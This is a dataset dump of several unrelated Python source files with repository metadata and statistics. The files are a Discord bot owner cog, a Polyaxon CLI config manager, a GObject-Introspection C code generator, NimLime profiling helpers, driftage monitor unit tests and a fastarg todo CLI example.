async def change_nick(self, ctx, *, name=None):
if await self.bot.is_owner(ctx.author):
if isinstance(ctx.channel, discord.TextChannel):
await ctx.send("Changing Nickname")
try:
await ctx.guild.me.edit(nick=name)
except discord.Forbidden:
await ctx.send("Appears not to have valid perms")
if isinstance(ctx.channel,discord.DMChannel):
await ctx.send("You can't use that in Dms.")
if await self.bot.is_owner(ctx.author) is False:
await ctx.send("You can't use that command")
class ServersEmbed(menus.ListPageSource):
async def format_page(self, menu, item):
embed = discord.Embed(title="Servers:",description=item,color=random.randint(0, 16777215))
return embed
@commands.command(brief="a command to give a list of servers(owner only)",help="Gives a list of guilds(Bot Owners only)")
async def servers(self, ctx):
if await self.bot.is_owner(ctx.author):
pag = commands.Paginator()
for g in self.bot.guilds:
pag.add_line(f"[{len(g.members)}/{g.member_count}] **{g.name}** (`{g.id}`) | {(g.system_channel or g.text_channels[0]).mention}")
pages = [page.strip("`") for page in pag.pages]
menu = ViewMenuPages(self.ServersEmbed(pages, per_page=1),delete_message_after=True)
if (ctx.author.dm_channel is None):
await ctx.author.create_dm()
await menu.start(ctx, channel = ctx.author.dm_channel)
if await self.bot.is_owner(ctx.author) is False:
await ctx.send("You can't use that it's owner only")
@commands.command(brief="only works with JDJG, but this command is meant to send updates to my webhook")
async def webhook_update(self, ctx, *, args = None):
if await self.bot.is_owner(ctx.author):
if args:
if isinstance(ctx.channel, discord.TextChannel):
try:
await ctx.message.delete()
except:
await ctx.send("It couldn't delete the message in this guils so, I kept it here.")
webhook = discord.Webhook.from_url(os.environ["webhook1"], session = self.bot.session)
embed=discord.Embed(title="Update",color=(35056),timestamp=(ctx.message.created_at))
embed.add_field(name="Update Info:",value=args)
embed.set_author(name="JDJG's Update",icon_url='https://i.imgur.com/pdQkCBv.png')
embed.set_footer(text="JDJG's Updates")
await webhook.send(embed=embed)
webhook=discord.Webhook.from_url(os.environ["webhook99"], session = self.bot.session)
embed=discord.Embed(title="Update",color=(35056),timestamp=(ctx.message.created_at))
embed.add_field(name="Update Info:",value=args)
embed.set_author(name="JDJG's Update",icon_url='https://i.imgur.com/pdQkCBv.png')
embed.set_footer(text="JDJG's Updates")
await webhook.send(embed=embed)
if args is None:
await ctx.send("You sadly can't use it like that.")
if await self.bot.is_owner(ctx.author) is False:
await ctx.send("You can't use that")
@commands.command(brief="Commands to see what guilds a person is in.")
async def mutualguilds(self, ctx, *, user: utils.BetterUserconverter = None):
user = user or ctx.author
pag = commands.Paginator()
for g in user.mutual_guilds:
pag.add_line(f"{g}")
pages = [page.strip("`") for page in pag.pages]
pages = pages or ["No shared servers"]
menu = ViewMenuPages(utils.mutualGuildsEmbed(pages, per_page=1),delete_message_after = True)
if (ctx.author.dm_channel is None):
await ctx.author.create_dm()
await menu.start(ctx, channel = ctx.author.dm_channel)
@commands.command(brief="A command to add sus_users with a reason")
async def addsus(self, ctx, *, user: utils.BetterUserconverter = None):
if user is None:
await ctx.send("can't have a user be none.")
if user:
await ctx.reply("Please give me a reason why:")
reason = await self.bot.wait_for("message",check= utils.check(ctx))
cur = await self.bot.sus_users.cursor()
await cur.execute("INSERT INTO sus_users VALUES (?, ?)", (user.id, reason.content))
await self.bot.sus_users.commit()
await cur.close()
await ctx.send("added sus users, succesfully")
@commands.command(brief="a command to remove sus users.")
async def removesus(self, ctx, *, user: utils.BetterUserconverter = None):
if user is None:
await ctx.send("You can't have a none user.")
if user:
cur = await self.bot.sus_users.cursor()
await cur.execute("DELETE FROM sus_users WHERE user_id = ?", (user.id,))
await self.bot.sus_users.commit()
await cur.close()
await ctx.send("Removed sus users.")
class SusUsersEmbed(menus.ListPageSource):
async def format_page(self, menu, item):
embed=discord.Embed(title = "Users Deemed Suspicious by JDJG Inc. Official", color = random.randint(0, 16777215))
embed.add_field(name = f"User ID : {item[0]}", value = f"**Reason :** {item[1]}", inline = False)
return embed
@commands.command(brief="a command to grab all in the sus_users list")
async def sus_users(self, ctx):
cur = await self.bot.sus_users.cursor()
cursor = await cur.execute("SELECT * FROM SUS_USERS;")
sus_users = tuple(await cursor.fetchall())
await cur.close()
await self.bot.sus_users.commit()
menu = ViewMenuPages(self.SusUsersEmbed(sus_users, per_page=1),delete_message_after=True)
await menu.start(ctx)
@sus_users.error
async def sus_users_error(self, ctx, error):
await ctx.send(error)
class TestersEmbed(menus.ListPageSource):
async def format_page(self, menu, item):
embed = discord.Embed(title = "Testing Users:", color = random.randint(0, 16777215))
embed.add_field(name = "User ID:", value = f"{item}", inline = False)
return embed
@commands.command(brief = "a command listed all the commands")
async def testers(self, ctx):
menu = ViewMenuPages(self.TestersEmbed(self.bot.testers, per_page = 1), delete_message_after = True)
await menu.start(ctx)
@commands.command()
async def update_sus(self, ctx):
await self.bot.sus_users.commit()
await ctx.send("Updated SQL boss.")
@update_sus.error
async def update_sus_error(self, ctx, error):
await ctx.send(error)
@commands.command(aliases=["bypass_command"])
async def command_bypass(self, ctx, user: utils.BetterUserconverter = None, *, command = None):
#make sure to swap to autoconverter if it gets added.
user = user or ctx.author
if command:
command_wanted=self.bot.get_command(command)
if command_wanted:
await ctx.send(f"{command_wanted.name} now accessible for the {user} for one command usage!")
self.bot.special_access[user.id]=command_wanted.name
if command_wanted is None:
await ctx.send("Please specify a valid command.")
if command is None:
await ctx.send("select a command :(")
@commands.command(brief = "resets cooldown for you.",aliases = ["reset_cooldown"])
async def resetcooldown(self, ctx, *, command = None):
if not command:
return await ctx.send("please specificy a command")
command_wanted = self.bot.get_command(command)
if not command_wanted:
return await ctx.send("please specify a command")
if not command_wanted.is_on_cooldown(ctx):
return await ctx.send("That doesn't have a cooldown/isn't on a cooldown.")
command_wanted.reset_cooldown(ctx)
await ctx.send(f"reset cooldown of {command_wanted}")
@commands.command(brief = "leaves a guild only use when needed or really wanted. Otherwise no thanks.")
async def leave_guild(self, ctx, *, guild: typing.Optional[discord.Guild] = None):
guild = guild or ctx.guild
if guild is None: return await ctx.send("Guild is None can't do anything.")
await ctx.send("Bot leaving guild :(")
try:
await guild.leave()
except Exception as e:
await ctx.send(f"Somehow an error occured: {e}")
traceback.print_exc()
@commands.command()
async def aioinput_test(self, ctx, *, args = None):
args = args or "Test"
result=await self.bot.loop.run_in_executor(None, input, (f"{args}:"))
await ctx.send(f"Result of the input was {result}")
@commands.command(brief="a powerful owner tool to reload local files that aren't reloadable.")
async def reload_basic(self, ctx, *, args = None):
if args is None:await ctx.send("Can't reload module named None")
if args:
try: module = importlib.import_module(name=args)
except Exception as e:
traceback.print_exc()
return await ctx.send(e)
try: value=importlib.reload(module)
except Exception as e:
traceback.print_exc()
return await ctx.send(e)
await ctx.send(f"Sucessfully reloaded {value.__name__} \nMain Package: {value.__package__}")
@commands.command(brief="backs up a channel and then sends it into a file or mystbin")
async def channel_backup(self, ctx):
messages = await ctx.channel.history(limit = None, oldest_first = True).flatten()
new_line = "\n"
page = "\n".join(f"{msg.author} ({('Bot' if msg.author.bot else 'User')}) : {msg.content} {new_line}Attachments : {msg.attachments}" if msg.content else f"{msg.author} ({('Bot' if msg.author.bot else 'User')}) : {new_line.join(f'{e.to_dict()}' for e in msg.embeds)} {new_line}Attachments : {msg.attachments}" for msg in messages)
mystbin_client = mystbin.Client(session = self.bot.session)
paste = await mystbin_client.post(page)
await ctx.author.send(content=f"Added text file to mystbin: \n{paste.url}")
@channel_backup.error
async def channel_backup_error(self, ctx, error):
etype = type(error)
trace = error.__traceback__
values=''.join(map(str,traceback.format_exception(etype, error, trace)))
pages = textwrap.wrap(values, width = 1992)
menu = ViewMenuPages(utils.ErrorEmbed(pages, per_page = 1),delete_message_after = True)
if (ctx.author.dm_channel is None):
await ctx.author.create_dm()
await menu.start(ctx, channel = ctx.author.dm_channel)
mystbin_client = mystbin.Client(session=self.bot.session)
paste = await mystbin_client.post(values)
await ctx.send(f"Traceback: {paste.url}")
@commands.command(brief = "adds packages and urls to rtfm DB", aliases=["add_rtfm"])
async def addrtfm(self, ctx, name = None, *, url = None):
if not name or not url:
return await ctx.send("You need a name and also url.")
cur = await self.bot.sus_users.cursor()
await cur.execute("INSERT INTO RTFM_DICTIONARY VALUES (?, ?)", (name, url))
await self.bot.sus_users.commit()
await cur.close()
await ctx.send(f"added {name} and {url} to the rtfm DB")
@commands.command(brief = "removes packages from the rtfm DB", aliases = ["remove_rtfm"])
async def removertfm(self, ctx, *, name = None):
if name is None:
return await ctx.send("You can't remove None")
cur = await self.bot.sus_users.cursor()
await cur.execute("DELETE FROM RTFM_DICTIONARY WHERE name = ?", (name,))
await self.bot.sus_users.commit()
await cur.close()
await ctx.send(f"Removed the rfm value {name}.")
@commands.command(brief = "a command to save images to imgur(for owner only lol)")
async def save_image(self, ctx):
if not ctx.message.attachments:
return await ctx.send("You need to provide some attachments.")
await ctx.send("JDJG doesn't take any responbility for what you upload here :eyes: don't upload anything bad okay?")
for x in ctx.message.attachments:
try:
discord.utils._get_mime_type_for_image(await x.read())
except Exception as e:
traceback.print_exc()
return await ctx.send(e)
imgur_client= aioimgur.ImgurClient(os.environ["imgur_id"], os.environ["imgur_secret"])
imgur_url = await imgur_client.upload(await x.read())
await ctx.send(f"{imgur_url['link']}")
@commands.command(brief="A command to remove testers")
async def remove_tester(self, ctx, *, user: utils.BetterUserconverter = None):
if user is None:
await ctx.send("You can't have a non existent user.")
if user:
cur = await self.bot.sus_users.cursor()
await cur.execute("DELETE FROM testers_list WHERE user_id = ?", (user.id,))
await self.bot.sus_users.commit()
await cur.close()
if user.id not in self.bot.testers:
return await ctx.send(f"{user} isn't in the testers list.")
else:
self.bot.testers.remove(user.id)
await ctx.send(f"Removed tester known as {user}")
@commands.command(brief="A command to add testers")
async def add_tester(self, ctx, *, user: utils.BetterUserconverter = None):
if user is None:
await ctx.send("You can't have a non existent user.")
if user:
cur = await self.bot.sus_users.cursor()
await cur.execute("INSERT INTO testers_list VALUES (?)", (user.id,))
await self.bot.sus_users.commit()
await cur.close()
if user.id not in self.bot.testers:
self.bot.testers.append(user.id)
await ctx.send(f"added tester known as {user}")
else:
return await ctx.send(f"{user} is in the testers list already!")
def tweepy_post(self, post_text = None):
consumer_key = os.getenv('tweet_key')
consumer_secret = os.getenv('tweet_secret')
auth = tweepy.OAuthHandler(consumer_key, consumer_secret)
access_token = os.getenv('tweet_access')
access_secret = os.getenv('tweet_token')
auth.set_access_token(access_token, access_secret)
twitter_api = tweepy.API(auth)
return twitter_api.update_status(status = post_text)
@commands.command(brief = "sends tweet to JDBot Twitter")
async def send_tweet(self, ctx, *, args = None):
if not args:
return await ctx.send("you can't send nothing to twitter.")
try:
tweet_time = functools.partial(self.tweepy_post, args)
post = await self.bot.loop.run_in_executor(None, tweet_time)
except Exception as e:
traceback.print_exc()
return await ctx.send(f"Exception occured at {e}")
await ctx.send(f"Url of sent tweet is: https://twitter.com/twitter/statuses/{post.id}")
@commands.command(brief = "chunks a guild for the purpose of testing purpose(it's owner only to be used in testing guilds only)")
async def chunk_guild(self, ctx):
if ctx.guild is None:
return await ctx.send("You can't chunk a guild that doesn't exist or a channel that is a DM.")
if ctx.guild.chunked:
return await ctx.send("No need to chunk this guild, it appears to be chunked")
await ctx.guild.chunk(cache = True)
await ctx.send("Finished chunking..")
@chunk_guild.error
async def chunk_guild_error(self, ctx, error):
await ctx.send(error)
traceback.print_exc()
@commands.command(brief = "displays the guild status and user status immediately")
async def stats_status(self, ctx):
await ctx.send("changing status, check now....")
await self.bot.change_presence(status=discord.Status.online, activity=discord.Activity(type=discord.ActivityType.watching, name=f"{len(self.bot.guilds)} servers | {len(self.bot.users)} users"))
@stats_status.error
async def stats_status_error(self, ctx, error):
await ctx.send(error)
@commands.command(brief="a command to give a list of servers(owner only)",help="Gives a list of guilds(Bot Owners only) but with join dates updated.")
async def servers2(self, ctx):
if await self.bot.is_owner(ctx.author):
sorted_guilds = sorted(self.bot.guilds, key=lambda guild: guild.me.joined_at)
pag = commands.Paginator()
for g in sorted_guilds:
pag.add_line(f"{discord.utils.format_dt(g.me.joined_at, style = 'd')} {discord.utils.format_dt(g.me.joined_at, style = 'T')} \n[{len(g.members)}/{g.member_count}] **{g.name}** (`{g.id}`) | {(g.system_channel or g.text_channels[0]).mention}\n")
pages = [page.strip("`") for page in pag.pages]
menu = ViewMenuPages(self.ServersEmbed(pages, per_page=1),delete_message_after=True)
if (ctx.author.dm_channel is None):
await ctx.author.create_dm()
await menu.start(ctx, channel = ctx.author.dm_channel)
if await self.bot.is_owner(ctx.author) is False:
await ctx.send("You can't use that it's owner only")
def setup(bot):
bot.add_cog(Owner(bot))
| 38.223265
| 333
| 0.676827
| 3,001
| 20,373
| 4.505165
| 0.142286
| 0.047337
| 0.060355
| 0.017751
| 0.525666
| 0.482544
| 0.442086
| 0.406435
| 0.372559
| 0.332914
| 0
| 0.005092
| 0.199971
| 20,373
| 532
| 334
| 38.295113
| 0.824406
| 0.00427
| 0
| 0.397985
| 0
| 0.017632
| 0.231907
| 0.017107
| 0
| 0
| 0
| 0
| 0
| 1
| 0.007557
| false
| 0.005038
| 0.017632
| 0
| 0.085642
| 0.027708
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
1389758aa9eb7eb25584e0a02ef64f27158cea18
| 2,395
|
py
|
Python
|
cli/polyaxon/managers/cli.py
|
hackerwins/polyaxon
|
ff56a098283ca872abfbaae6ba8abba479ffa394
|
[
"Apache-2.0"
] | null | null | null |
cli/polyaxon/managers/cli.py
|
hackerwins/polyaxon
|
ff56a098283ca872abfbaae6ba8abba479ffa394
|
[
"Apache-2.0"
] | null | null | null |
cli/polyaxon/managers/cli.py
|
hackerwins/polyaxon
|
ff56a098283ca872abfbaae6ba8abba479ffa394
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python
#
# Copyright 2019 Polyaxon, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# coding: utf-8
from __future__ import absolute_import, division, print_function
from distutils.version import LooseVersion # pylint:disable=import-error
from polyaxon.managers.base import BaseConfigManager
from polyaxon.schemas.cli.cli_configuration import CliConfigurationConfig
class CliConfigManager(BaseConfigManager):
"""Manages access cli configuration .polyaxoncli file."""
IS_GLOBAL = True
CONFIG_FILE_NAME = ".polyaxoncli"
CONFIG = CliConfigurationConfig
FREQUENCY = 3
@classmethod
def _get_count(cls):
config = cls.get_config_or_default()
return config.check_count + 1
@classmethod
def reset(
cls,
check_count=None,
current_version=None,
server_versions=None,
log_handler=None,
):
if not any([check_count, current_version, server_versions, log_handler]):
return
cli_config = cls.get_config_or_default()
if check_count is not None:
cli_config.check_count = check_count
if current_version is not None:
cli_config.current_version = current_version
if server_versions is not None:
cli_config.server_versions = server_versions
if log_handler is not None:
cli_config.log_handler = log_handler
CliConfigManager.set_config(config=cli_config)
return cli_config
@classmethod
def should_check(cls):
count = cls._get_count()
cls.reset(check_count=count)
if count > cls.FREQUENCY:
return True
config = cls.get_config_or_default()
if config.current_version is None or config.min_version is None:
return True
return LooseVersion(config.current_version) < LooseVersion(config.min_version)
| 32.808219
| 86
| 0.703967
| 304
| 2,395
| 5.355263
| 0.391447
| 0.042998
| 0.022113
| 0.029484
| 0.096437
| 0.052211
| 0.035627
| 0
| 0
| 0
| 0
| 0.005965
| 0.230063
| 2,395
| 72
| 87
| 33.263889
| 0.876898
| 0.276827
| 0
| 0.159091
| 0
| 0
| 0.007018
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.068182
| false
| 0
| 0.090909
| 0
| 0.409091
| 0.022727
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
138acf726b02bf36085bf40542bda0ebebd538c5
| 6,190
|
py
|
Python
|
openbmc/build/tmp/deploy/sdk/witherspoon-2019-08-08/sysroots/armv6-openbmc-linux-gnueabi/usr/lib/gobject-introspection/giscanner/codegen.py
|
sotaoverride/backup
|
ca53a10b72295387ef4948a9289cb78ab70bc449
|
[
"Apache-2.0"
] | null | null | null |
openbmc/build/tmp/deploy/sdk/witherspoon-2019-08-08/sysroots/armv6-openbmc-linux-gnueabi/usr/lib/gobject-introspection/giscanner/codegen.py
|
sotaoverride/backup
|
ca53a10b72295387ef4948a9289cb78ab70bc449
|
[
"Apache-2.0"
] | null | null | null |
openbmc/build/tmp/deploy/sdk/witherspoon-2019-08-08/sysroots/armv6-openbmc-linux-gnueabi/usr/lib/gobject-introspection/giscanner/codegen.py
|
sotaoverride/backup
|
ca53a10b72295387ef4948a9289cb78ab70bc449
|
[
"Apache-2.0"
] | null | null | null |
# -*- Mode: Python -*-
# GObject-Introspection - a framework for introspecting GObject libraries
# Copyright (C) 2010 Red Hat, Inc.
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the
# Free Software Foundation, Inc., 59 Temple Place - Suite 330,
# Boston, MA 02111-1307, USA.
#
import os
from contextlib import contextmanager
from . import ast
class CCodeGenerator(object):
def __init__(self, namespace,
out_h_filename,
out_c_filename,
function_decoration=[],
include_first_header=[],
include_last_header=[],
include_first_src=[],
include_last_src=[]):
self.out_h_filename = out_h_filename
self.out_c_filename = out_c_filename
self.function_decoration = function_decoration
self.include_first_header = include_first_header
self.include_last_header = include_last_header
self.include_first_src = include_first_src
self.include_last_src = include_last_src
self._function_bodies = {}
self.namespace = namespace
def gen_symbol(self, name):
name = name.replace(' ', '_')
return '%s_%s' % (self.namespace.symbol_prefixes[0], name)
def _typecontainer_to_ctype(self, param):
if (isinstance(param, ast.Parameter)
and param.direction in (ast.PARAM_DIRECTION_OUT, ast.PARAM_DIRECTION_INOUT)):
suffix = '*'
else:
suffix = ''
if (param.type.is_equiv((ast.TYPE_STRING, ast.TYPE_FILENAME))
and param.transfer == ast.PARAM_TRANSFER_NONE):
return "const gchar*" + suffix
return param.type.ctype + suffix
def _write_prelude(self, out, func):
if self.function_decoration:
out.write("""
%s""" % " ".join(self.function_decoration))
out.write("""
%s
%s (""" % (self._typecontainer_to_ctype(func.retval), func.symbol))
l = len(func.parameters)
if func.parameters:
for i, param in enumerate(func.parameters):
ctype = self._typecontainer_to_ctype(param)
out.write('%s %s' % (ctype, param.argname))
if i < l - 1:
out.write(", ")
else:
out.write('void')
out.write(")")
def _write_prototype(self, func):
self._write_prelude(self.out_h, func)
self.out_h.write(";\n\n")
def _write_annotation_transfer(self, node):
if (node.type not in ast.BASIC_TYPES or
node.type.ctype.endswith('*')):
self.out_c.write(" (transfer %s)" % (node.transfer, ))
def _write_docs(self, func):
self.out_c.write("/**\n * %s:\n" % (func.symbol, ))
for param in func.parameters:
self.out_c.write(" * @%s" % (param.argname, ))
if param.direction in (ast.PARAM_DIRECTION_OUT,
ast.PARAM_DIRECTION_INOUT):
if param.caller_allocates:
allocate_string = ' caller-allocates'
else:
allocate_string = ''
self.out_c.write(": (%s%s) " % (param.direction,
allocate_string))
self._write_annotation_transfer(param)
self.out_c.write(":\n")
self.out_c.write(' *\n')
self.out_c.write(' * Undocumented.')
if func.retval.type != ast.TYPE_NONE:
self.out_c.write('\n *\n')
self.out_c.write(' * Returns: ')
self._write_annotation_transfer(func.retval)
self.out_c.write('\n */')
@contextmanager
def _function(self, func):
self._write_prototype(func)
self._write_docs(func)
self._write_prelude(self.out_c, func)
self.out_c.write("\n{\n")
yield
self.out_c.write("}\n\n")
def _codegen_start(self):
warning = '/* GENERATED BY testcodegen.py; DO NOT EDIT */\n\n'
self.out_h.write(warning)
nsupper = self.namespace.name.upper()
for header in self.include_first_header:
self.out_h.write("""#include "%s"\n""" % header)
self.out_h.write("""
#ifndef __%s_H__
#define __%s_H__
#include <glib-object.h>
""" % (nsupper, nsupper))
for header in self.include_last_header:
self.out_h.write("""#include "%s"\n""" % header)
self.out_c.write(warning)
for header in self.include_first_src:
self.out_c.write("""#include "%s"\n""" % header)
src_dir = os.path.dirname(os.path.realpath(self.out_c.name))
header = os.path.relpath(self.out_h_filename, src_dir)
self.out_c.write("""#include "%s"\n\n""" % (header, ))
for header in self.include_last_src:
self.out_c.write("""#include "%s"\n""" % header)
def _codegen_end(self):
self.out_h.write("""#endif\n""")
self.out_h.close()
self.out_c.close()
def set_function_body(self, node, body):
assert isinstance(node, ast.Function)
self._function_bodies[node] = body
def codegen(self):
self.out_h = open(self.out_h_filename, 'w')
self.out_c = open(self.out_c_filename, 'w')
self._codegen_start()
for node in self.namespace.values():
if isinstance(node, ast.Function):
with self._function(node):
body = self._function_bodies.get(node)
if not body:
body = ''
self.out_c.write(body)
self._codegen_end()
| 34.775281
| 85
| 0.593538
| 775
| 6,190
| 4.516129
| 0.243871
| 0.072
| 0.052571
| 0.063143
| 0.233714
| 0.203429
| 0.111714
| 0.086
| 0.086
| 0.056571
| 0
| 0.004761
| 0.287399
| 6,190
| 177
| 86
| 34.971751
| 0.78871
| 0.132795
| 0
| 0.070866
| 0
| 0
| 0.068063
| 0
| 0
| 0
| 0
| 0
| 0.007874
| 1
| 0.094488
| false
| 0
| 0.023622
| 0
| 0.149606
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
138ba740eae4da2fa0a99d533446f723a2531106
| 1,522
|
py
|
Python
|
nimlime_core/utils/internal_tools.py
|
gmpreussner/Varriount.NimLime
|
33da0424248bf9360c2a7cbca4a22da7a8020785
|
[
"MIT"
] | null | null | null |
nimlime_core/utils/internal_tools.py
|
gmpreussner/Varriount.NimLime
|
33da0424248bf9360c2a7cbca4a22da7a8020785
|
[
"MIT"
] | null | null | null |
nimlime_core/utils/internal_tools.py
|
gmpreussner/Varriount.NimLime
|
33da0424248bf9360c2a7cbca4a22da7a8020785
|
[
"MIT"
] | null | null | null |
# coding=utf-8
"""
Internal tools for NimLime development & testing.
"""
from pprint import pprint
import sublime
try:
from cProfile import Profile
except ImportError:
from profile import Profile
from functools import wraps
from pstats import Stats
try:
from StringIO import StringIO
except ImportError:
from io import StringIO
debug_on = False
if debug_on:
sublime.message_dialog("NimLime running in debug mode.")
# Debug printer
def print_debug(*args, **kwargs):
"""
Print when debugging.
:type args: Any
:type kwargs: Any
"""
if debug_on:
pprint(*args, **kwargs)
# Profiling functions
profiler = Profile()
profiler_running = False
def profile_func(func):
"""
Decorator which profiles a single function.
Call print_profile_data to print the collected data.
:type func: Callable
:rtype: Callable
"""
@wraps(func)
def _profile_wrapper(*args, **kwargs):
global profiler_running
if not profiler_running:
profiler_running = True
try:
profiler.enable()
return func(*args, **kwargs)
finally:
profiler.disable()
profiler_running = False
return _profile_wrapper
def print_profile_data():
"""
Print the collected profile data.
"""
stream = StringIO()
statistics = Stats(profiler, stream=stream)
statistics.sort_stats('cumulative')
statistics.print_stats()
print(stream.getvalue())
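# Hypothetical usage sketch (added for illustration; not part of the original
# NimLime module). It shows how profile_func and print_profile_data are meant
# to be combined; `example_work` is an invented name:
#
#     @profile_func
#     def example_work():
#         return sum(i * i for i in range(100000))
#
#     example_work()
#     print_profile_data()  # prints cumulative timings gathered by the profiler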
| 20.849315
| 60
| 0.653088
| 171
| 1,522
| 5.690058
| 0.421053
| 0.077081
| 0.043165
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.000892
| 0.263469
| 1,522
| 72
| 61
| 21.138889
| 0.867083
| 0.211564
| 0
| 0.230769
| 0
| 0
| 0.035556
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.102564
| false
| 0
| 0.25641
| 0
| 0.410256
| 0.153846
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
138c6bcf0225f274dd1eb1c256462cdafdb949eb
| 2,524
|
py
|
Python
|
test/unit/test_monitor.py
|
dmvieira/driftage
|
830188aa341029cc2a643b2b3b50e625953a35eb
|
[
"Apache-2.0"
] | 4
|
2020-09-24T23:59:54.000Z
|
2020-09-27T16:43:37.000Z
|
test/unit/test_monitor.py
|
dmvieira/driftage
|
830188aa341029cc2a643b2b3b50e625953a35eb
|
[
"Apache-2.0"
] | 2
|
2021-03-06T19:55:34.000Z
|
2021-03-06T20:06:42.000Z
|
test/unit/test_monitor.py
|
dmvieira/driftage
|
830188aa341029cc2a643b2b3b50e625953a35eb
|
[
"Apache-2.0"
] | null | null | null |
import orjson
from asynctest import TestCase, Mock, patch
from freezegun import freeze_time
from driftage.monitor import Monitor
class TestMonitor(TestCase):
def setUp(self):
self.monitor = Monitor(
"user_test@local", "pass_test", "identif"
)
def tearDown(self):
self.monitor.container.stop()
def test_should_set_identifier_or_agent_name(self):
self.assertEqual(
self.monitor._identifier,
"identif"
)
monitor = Monitor(
"user_test2@local", "pass_test"
)
self.assertEqual(
monitor._identifier,
"user_test2"
)
monitor.container.stop()
@patch("driftage.monitor.WaitMonitorSubscriptions")
async def test_should_add_subscription_behaviour(self, behaviour_mock):
self.monitor.add_behaviour = Mock()
await self.monitor.setup()
self.monitor.add_behaviour.assert_called_once_with(
behaviour_mock()
)
@freeze_time("1989-08-12")
@patch("driftage.monitor.FastNotifyContacts")
@patch("driftage.monitor.Template")
def test_should_notify_contacts_on_new_data(
self, template_mock, behaviour_mock):
self.monitor.add_behaviour = Mock()
self.monitor.collect({"my data": 1})
self.monitor.add_behaviour.assert_called_once_with(
behaviour_mock(),
template=template_mock.return_value
)
template_mock.assert_called_once_with(
body=str(orjson.dumps({
"data": {"my data": 1},
"metadata": {
"timestamp": 618883200.0,
"identifier": "identif"
}
}), "utf-8")
)
@freeze_time("1989-08-12")
@patch("driftage.monitor.FastNotifyContacts")
@patch("driftage.monitor.Template")
def test_should_notify_contacts_on_new_data_with_call(
self, template_mock, behaviour_mock):
self.monitor.add_behaviour = Mock()
self.monitor({"my data": 1})
self.monitor.add_behaviour.assert_called_once_with(
behaviour_mock(),
template=template_mock.return_value
)
template_mock.assert_called_once_with(
body=str(orjson.dumps({
"data": {"my data": 1},
"metadata": {
"timestamp": 618883200.0,
"identifier": "identif"
}
}), "utf-8")
)
| 31.160494
| 75
| 0.587163
| 253
| 2,524
| 5.58498
| 0.268775
| 0.093418
| 0.059448
| 0.097665
| 0.619958
| 0.619958
| 0.619958
| 0.591649
| 0.591649
| 0.591649
| 0
| 0.025186
| 0.307845
| 2,524
| 80
| 76
| 31.55
| 0.783629
| 0
| 0
| 0.478873
| 0
| 0
| 0.1458
| 0.063788
| 0
| 0
| 0
| 0
| 0.098592
| 1
| 0.070423
| false
| 0.028169
| 0.056338
| 0
| 0.140845
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
138d56c884e89de3d6a25a794b256d4f746b9c4d
| 354
|
py
|
Python
|
examples/todo_advanced/main.py
|
travisluong/fastarg
|
b21d5307ce6b296aa16f30bf220ca2ead8e9d4d3
|
[
"MIT"
] | 1
|
2022-03-27T20:30:45.000Z
|
2022-03-27T20:30:45.000Z
|
examples/todo_advanced/main.py
|
travisluong/fastarg
|
b21d5307ce6b296aa16f30bf220ca2ead8e9d4d3
|
[
"MIT"
] | null | null | null |
examples/todo_advanced/main.py
|
travisluong/fastarg
|
b21d5307ce6b296aa16f30bf220ca2ead8e9d4d3
|
[
"MIT"
] | null | null | null |
import fastarg
import commands.todo as todo
import commands.user as user
app = fastarg.Fastarg(description="productivity app", prog="todo")
@app.command()
def hello_world(name: str):
"""hello world"""
print("hello " + name)
app.add_fastarg(todo.app, name="todo")
app.add_fastarg(user.app, name="user")
if __name__ == "__main__":
app.run()
| 22.125
| 66
| 0.70339
| 51
| 354
| 4.666667
| 0.411765
| 0.088235
| 0.109244
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.138418
| 354
| 16
| 67
| 22.125
| 0.780328
| 0.031073
| 0
| 0
| 0
| 0
| 0.12426
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.090909
| false
| 0
| 0.272727
| 0
| 0.363636
| 0.090909
| 0
| 0
| 0
| null | 0
